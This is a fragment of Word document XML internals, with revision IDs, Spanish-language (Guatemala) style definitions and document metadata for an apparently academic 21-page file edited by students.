    <w:rsid w:val="00E53F1E"/>
    <w:rsid w:val="00E54052"/>
    <w:rsid w:val="00E5485A"/>
    <w:rsid w:val="00E54ADE"/>
    <w:rsid w:val="00E565D5"/>
    <w:rsid w:val="00E6081B"/>
    <w:rsid w:val="00E63548"/>
    <w:rsid w:val="00E723B7"/>
    <w:rsid w:val="00E72F06"/>
    <w:rsid w:val="00E80705"/>
    <w:rsid w:val="00E81AB1"/>
    <w:rsid w:val="00E82A80"/>
    <w:rsid w:val="00E8376B"/>
    <w:rsid w:val="00E85718"/>
    <w:rsid w:val="00E86246"/>
    <w:rsid w:val="00E8685C"/>
    <w:rsid w:val="00E86B90"/>
    <w:rsid w:val="00E87425"/>
    <w:rsid w:val="00E94943"/>
    <w:rsid w:val="00E94B09"/>
    <w:rsid w:val="00E95AE4"/>
    <w:rsid w:val="00E9659F"/>
    <w:rsid w:val="00E975CB"/>
    <w:rsid w:val="00EA02A0"/>
    <w:rsid w:val="00EA36F0"/>
    <w:rsid w:val="00EA4BB4"/>
    <w:rsid w:val="00EA7612"/>
    <w:rsid w:val="00EB315E"/>
    <w:rsid w:val="00EB3309"/>
    <w:rsid w:val="00EB630B"/>
    <w:rsid w:val="00EB67A1"/>
    <w:rsid w:val="00EC1A6A"/>
    <w:rsid w:val="00EC2DAF"/>
    <w:rsid w:val="00EC7CFF"/>
    <w:rsid w:val="00ED2BFD"/>
    <w:rsid w:val="00ED5F3A"/>
    <w:rsid w:val="00ED64B8"/>
    <w:rsid w:val="00EE0226"/>
    <w:rsid w:val="00EE18AD"/>
    <w:rsid w:val="00EE23C2"/>
    <w:rsid w:val="00EE48E7"/>
    <w:rsid w:val="00EE7381"/>
    <w:rsid w:val="00EF3B8E"/>
    <w:rsid w:val="00EF4248"/>
    <w:rsid w:val="00F03663"/>
    <w:rsid w:val="00F03D02"/>
    <w:rsid w:val="00F04B34"/>
    <w:rsid w:val="00F05551"/>
    <w:rsid w:val="00F07171"/>
    <w:rsid w:val="00F10470"/>
    <w:rsid w:val="00F112B5"/>
    <w:rsid w:val="00F121BF"/>
    <w:rsid w:val="00F12FEE"/>
    <w:rsid w:val="00F14DA4"/>
    <w:rsid w:val="00F17070"/>
    <w:rsid w:val="00F20E84"/>
    <w:rsid w:val="00F21D9A"/>
    <w:rsid w:val="00F22BC8"/>
    <w:rsid w:val="00F2605B"/>
    <w:rsid w:val="00F26A98"/>
    <w:rsid w:val="00F26FE2"/>
    <w:rsid w:val="00F30290"/>
    <w:rsid w:val="00F36282"/>
    <w:rsid w:val="00F3667B"/>
    <w:rsid w:val="00F41275"/>
    <w:rsid w:val="00F422A6"/>
    <w:rsid w:val="00F449A4"/>
    <w:rsid w:val="00F46CB0"/>
    <w:rsid w:val="00F52909"/>
    <w:rsid w:val="00F53F43"/>
    <w:rsid w:val="00F5463F"/>
    <w:rsid w:val="00F54C73"/>
    <w:rsid w:val="00F54CF3"/>
    <w:rsid w:val="00F61608"/>
    <w:rsid w:val="00F6369C"/>
    <w:rsid w:val="00F63D24"/>
    <w:rsid w:val="00F63E30"/>
    <w:rsid w:val="00F646B9"/>
    <w:rsid w:val="00F64DE0"/>
    <w:rsid w:val="00F66C62"/>
    <w:rsid w:val="00F702A2"/>
    <w:rsid w:val="00F715C0"/>
    <w:rsid w:val="00F72685"/>
    <w:rsid w:val="00F73DB8"/>
    <w:rsid w:val="00F74976"/>
    <w:rsid w:val="00F756E1"/>
    <w:rsid w:val="00F77CC1"/>
    <w:rsid w:val="00F8053B"/>
    <w:rsid w:val="00F95ED3"/>
    <w:rsid w:val="00F96569"/>
    <w:rsid w:val="00FA3DF1"/>
    <w:rsid w:val="00FA6F6E"/>
    <w:rsid w:val="00FA78DC"/>
    <w:rsid w:val="00FA795C"/>
    <w:rsid w:val="00FB1B91"/>
    <w:rsid w:val="00FB2963"/>
    <w:rsid w:val="00FB4035"/>
    <w:rsid w:val="00FB58A9"/>
    <w:rsid w:val="00FB5E29"/>
    <w:rsid w:val="00FB6AC3"/>
    <w:rsid w:val="00FC006E"/>
    <w:rsid w:val="00FC0EC5"/>
    <w:rsid w:val="00FC4661"/>
    <w:rsid w:val="00FC5E91"/>
    <w:rsid w:val="00FC7189"/>
    <w:rsid w:val="00FD2D6A"/>
    <w:rsid w:val="00FD594E"/>
    <w:rsid w:val="00FD69BF"/>
    <w:rsid w:val="00FD6E90"/>
    <w:rsid w:val="00FD770E"/>
    <w:rsid w:val="00FE199F"/>
    <w:rsid w:val="00FE28D5"/>
    <w:rsid w:val="00FE624C"/>
    <w:rsid w:val="00FF0CFF"/>
    <w:rsid w:val="00FF284A"/>
    <w:rsid w:val="00FF38CE"/>
    <w:rsid w:val="00FF456D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6A86B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9DA4069D-FDF7-4D8D-808E-D25C559D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D0C"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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9B3D8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2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45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45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1F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1F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1F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1F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1F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D9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C5D90"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C5D9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D90"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B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3D8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454C2E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="24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454C2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GT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D5457"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:i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4D5457"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:sz w:val="24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961F57"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:lang w:val="es-GT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo6Car">
    <w:name w:val="Título 6 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00961F57"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"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1F5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1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GT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0036053E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0036053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es-GT"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003605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7352A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8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F68F9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10B30"/>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB04F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B04FA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00AB04FA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kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-GT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00096BD9"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sinespaciado">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00EE18A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3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es-GT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6282"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="es-GT" w:eastAsia="es-GT"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F36282"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00304040"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula4-nfasis1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00951D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50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0858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  <w:style w:type="character" w:styleId="nfasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00AD4876"/>
    <w:rPr>
      <w:i/>
      <w:iCs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2399E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E1103B"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:iCs/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fs-3">
    <w:name w:val="fs-3"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="007D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2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6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45326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735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12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4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88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2273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4498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99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99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4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localhost:7474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BFFC-FAF6-43ED-B10F-83D0112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3</TotalTime>
  <Pages>21</Pages>
  <Words>53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RNANDEZ SANTIZO</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>187504 - BRANDON EDUARDO GODINEZ SURET</cp:lastModifiedBy>
  <cp:revision>408</cp:revision>
  <cp:lastPrinted>2025-10-24T03:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-13T05:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-1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caf7c8e30c226fa76c6e1a88f4d623625899bb1c1185ca6138b77697cb30f</vt:lpwstr>
  </property>
</Properties>
</file>